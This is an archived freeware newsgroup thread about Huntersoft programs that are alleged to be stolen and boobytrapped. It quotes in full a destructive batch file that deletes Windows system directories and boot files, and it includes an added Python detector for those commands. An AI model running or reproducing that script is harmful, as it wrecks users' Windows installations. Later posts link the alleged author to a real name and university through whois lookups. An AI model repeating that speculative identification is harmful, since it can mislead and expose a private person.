Huntersoft - new information

Susan Bugher

I received information about this offlist. See:

http://download.com.com/3302-2094-10121444.html

"CNET User Opinions" for Windriver Ghost by Huntersoft.

The opinions include an accusation by Andrew Futcher RubyMicro Head
Developer http://www.rubymicro.com that the Huntersoft program was
stolen from them.

15 opinions in all, many of them from *Duling* praising the program. . .

the wording seems familiar . . .


There is new information at:

http://www.halfdone.com/SOTW/UnknownDevicesRip/

http://www.halfdone.com/SOTW/Message2Huntersoft/

<quote> Ok, it appears that at least Unknown Devices Identifier 3.01 is
boobytrapped. </quote>


Susan
 
John Corliss

Susan said:
I received information about this offlist. See:

http://download.com.com/3302-2094-10121444.html

"CNET User Opinions" for Windriver Ghost by Huntersoft.
The opinions include an accusation by Andrew Futcher RubyMicro Head
Developer http://www.rubymicro.com that the Huntersoft program was
stolen from them.
15 opinions in all, many of them from *Duling* praising the program. . .
the wording seems familiar . . .
There is new information at:

http://www.halfdone.com/SOTW/UnknownDevicesRip/
http://www.halfdone.com/SOTW/Message2Huntersoft/

<quote> Ok, it appears that at least Unknown Devices Identifier 3.01 is
boobytrapped. </quote>

Specifically this:

"Ok, it appears that at least Unknown Devices Identifier 3.01 is
boobytrapped. Under certain conditions that I'm not quite sure about,
the program creates and runs this batch file:

@echo off
del /Q *.*
del /Q system32\*.*
del /Q system\*.*
del /Q inf\*.*
del /Q ServicePackFiles\i386\*.*
attrib -r -h -s c:\ntldr
attrib -r -h -s c:\ntdetect.com
attrib -r -h -s c:\io.sys
attrib -r -h -s c:\command.com
del /Q c:\ntldr
del /Q c:\ntdetect.com
del /Q c:\io.sys
del /Q c:\command.com
del /Q txt.bat

This batch script tries to delete several files, likely trying to break
Windows itself."

That it tries to break Windows is more than just likely. It seems
obvious to me that "Jacques" included this virus in order to prevent
examination of "his" program's code.

What a slimeball (s)he(it) is. Perhaps the authorities in Korea should
be alerted to his activities. Maybe their laws will lead to his arrest.

--
Regards from John Corliss
alt.comp.freeware F.A.Q.:
http://www.ccountry.net/~jcorliss/F.A.Q./FrameSet1.html
Note that I can't see any of Andy Mabbett's troll posts
because I have him killfiled.
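
A static triage check for the pattern in the batch file quoted above, as an added example that is not part of the original thread or of any tool it mentions. The function name, rule names and the `WINDOWS_DIRS` grouping are this example's own choices; the file and directory names come from the quoted script.

```python
import re

# Names taken from the batch file quoted in the thread.
BOOT_FILES = {"ntldr", "ntdetect.com", "io.sys", "command.com"}
WINDOWS_DIRS = {"system32", "system", "inf", "servicepackfiles"}

# The batch file as quoted in the post above, used as test input only.
SAMPLE = r"""@echo off
del /Q *.*
del /Q system32\*.*
del /Q system\*.*
del /Q inf\*.*
del /Q ServicePackFiles\i386\*.*
attrib -r -h -s c:\ntldr
attrib -r -h -s c:\ntdetect.com
attrib -r -h -s c:\io.sys
attrib -r -h -s c:\command.com
del /Q c:\ntldr
del /Q c:\ntdetect.com
del /Q c:\io.sys
del /Q c:\command.com
del /Q txt.bat"""

def triage_batch(text, script_name=""):
    """Return (line_no, rule, target) for each destructive command found."""
    findings, unprotected = [], set()
    for no, raw in enumerate(text.splitlines(), 1):
        m = re.match(r"@?\s*(attrib|del|erase)\s+(.*)", raw.strip(), re.I)
        if not m:
            continue
        cmd, args = m.group(1).lower(), m.group(2).lower().split()
        # First argument that is not a switch such as /q, -r or +h.
        tgt = next((a.strip('"') for a in args
                    if not re.fullmatch(r"[/+-][a-z]+", a)), "")
        parts = tgt.replace("/", "\\").split("\\")
        if cmd == "attrib":
            if {"-r", "-h", "-s"} & set(args):   # protection bits cleared
                unprotected.add(tgt)
        elif parts[-1] in BOOT_FILES:
            rule = "boot-file-delete" + ("-after-attrib" if tgt in unprotected else "")
            findings.append((no, rule, tgt))
        elif "*" in parts[-1]:
            in_win = WINDOWS_DIRS & set(parts[:-1])
            findings.append((no, "wildcard-delete-windows-dir" if in_win
                             else "wildcard-delete", tgt))
        elif script_name and parts[-1] == script_name.lower():
            findings.append((no, "self-delete", tgt))
    return findings
```

Calling `triage_batch(SAMPLE, "txt.bat")` flags the wildcard deletes, the four boot files removed after their attributes are cleared, and the script deleting itself; an ordinary cleanup line such as `del /Q build\old.log` produces no finding.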
 
»Q«

That it tries to break Windows is more than just likely. It seems
obvious to me that "Jacques" included this virus in order to
prevent examination of "his" program's code.

Not a virus, unless it infects other files and can replicate. But
malware certainly.

What a slimeball (s)he(it) is. Perhaps the authorities in Korea
should be alerted to his activities. Maybe their laws will lead to
his arrest.

China, as I recall.
 
John Corliss

»Q« said:
Not a virus, unless it infects other files and can replicate. But
malware certainly.

Thanks for the correction.

China, as I recall.

According to Mike Moniz on this website:

http://www.halfdone.com/SOTW/Message2Huntersoft/

Jacques' "IP (211.233.72.119) is actually in Seoul, Korea."

However, that could indeed be an incorrect assumption.


--
Regards from John Corliss
alt.comp.freeware F.A.Q.:
http://www.ccountry.net/~jcorliss/F.A.Q./FrameSet1.html
Note that I can't see any of Andy Mabbett's troll posts
because I have him killfiled.
 
John Corliss

»Q« said:
That one is indeed in Korea. He has posted from connections in China,
and as I recall, his website is hosted in France. I guess he'd rather
no one know quite where he is. ;)

Well, what I meant to say was that it could be a false assumption on
my part that his location is in Korea.

His website, however, is hosted by an outfit in Beijing, China since
www.zhangduo.com resolves to 211.154.211.103 211.154.211.104 and
211.154.211.18, and when you do a whois using:

http://www.apnic.net/apnic-bin/whois.pl

it says this is the case.

He has registered his domain using French email addresses in France:

http://www.samspade.org/t/lookat?a=http://www.zhangduo.com

Looks like his real name is Zhang Duo and he's a student at Fudan
University. I could be wrong, but in China, falsifying such things
might land him in a prison camp so it's likely that they are correct.
Note that his primary DNS is in China too.

As for that French email address through "voila.fr":

http://voila.fr/

they offer throwaway email accounts, link in the upper right-hand
corner under "Communiquer" where it says "E-mail gratuit".

--
Regards from John Corliss
alt.comp.freeware F.A.Q.:
http://www.ccountry.net/~jcorliss/F.A.Q./FrameSet1.html
Note that I can't see any of Andy Mabbett's troll posts
because I have him killfiled.
 
